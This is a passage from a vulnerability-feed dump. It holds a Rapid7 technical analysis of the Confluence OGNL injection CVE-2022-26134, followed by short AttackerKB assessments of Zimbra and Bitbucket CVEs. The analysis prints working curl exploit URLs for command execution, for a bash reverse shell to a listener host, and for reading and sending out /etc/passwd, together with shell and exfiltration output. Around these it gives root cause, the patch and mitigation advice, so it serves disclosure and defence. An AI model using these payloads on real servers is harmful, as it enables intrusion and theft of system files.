/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection &amp; Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-06-03T17:15:08", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 19, 2022 4:18pm UTC reported:\n\nThis is really bad \u2013 remote root on an organization\u2019s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2022-27925", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-11-03T00:00:00", "id": "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "href": "https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:07", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:47pm UTC reported:\n\nThis is a privilege-escalation vulnerability in Zimbra, to go from the `zimbra` user to `root`. As of writing, this has been publicly known for nearly a near, and reported to Zimbra for about a month.\n\nAlthough it requires an account, there have been a whole pile of recent CVEs that get you there \u2013 [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-37393", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37393"], "modified": "2022-08-16T00:00:00", "id": "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "href": "https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:19", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 16, 2022 8:10pm UTC reported:\n\nUltimately, this is annoying and unreliable to exploit, but we did get it working and confirm it\u2019s a problem.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-27924", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333"], "modified": "2022-08-16T00:00:00", "id": "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "href": "https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:00", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:43pm UTC reported:\n\nThis is basically [cve-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) \u2013 it\u2019s the same exploit, but you don\u2019t send an auth cookie and it fails to prevent access.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-37042", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-11-03T00:00:00", "id": "AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "href": "https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:14:34", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at September 20, 2022 9:03pm UTC reported:\n\nVery easy patch to reverse and exploit to develop. Public proof of concept exist, as well as a Metasploit module. Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-36804", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-30333", "CVE-2022-36804"], "modified": "2022-09-21T00:00:00", "id": "AKB:A5F9A5B4-EEF8-4409-9D1D-846536B8D033", "href": "https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T02:14:56", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or 